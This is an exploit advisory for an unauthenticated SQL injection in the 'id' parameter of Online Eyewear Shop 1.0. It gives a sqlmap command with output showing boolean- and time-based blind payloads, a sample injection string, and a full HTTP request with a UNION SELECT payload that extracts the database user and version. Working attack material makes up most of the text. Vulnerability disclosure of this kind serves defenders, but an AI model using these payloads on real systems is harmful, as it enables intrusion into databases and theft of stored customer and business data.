# Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)  
# Date: 2023-01-02  
# Exploit Author: Muhammad Navaid Zafar Ansari  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)  
# CVE: Not Assigned Yet  
# References: -  
1. Description:  
Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.  
2. Proof of Concept:  
Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.  
Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql  
SQLMap Response:  
[*] starting @ 04:49:58 /2023-02-01/  
[04:49:58] [INFO] testing connection to the target URL  
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n  
sqlmap resumed the following injection point(s) from stored session:  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK  
[04:50:00] [INFO] testing MySQL  
[04:50:00] [INFO] confirming MySQL  
[04:50:00] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Debian  
web application technology: Apache 2.4.55, PHP  
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  
3. Example payload:  
' AND 1=1 AND 'test'='test  
4. Burpsuite request:  
GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1  
Host: localhost  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip  
Connection: close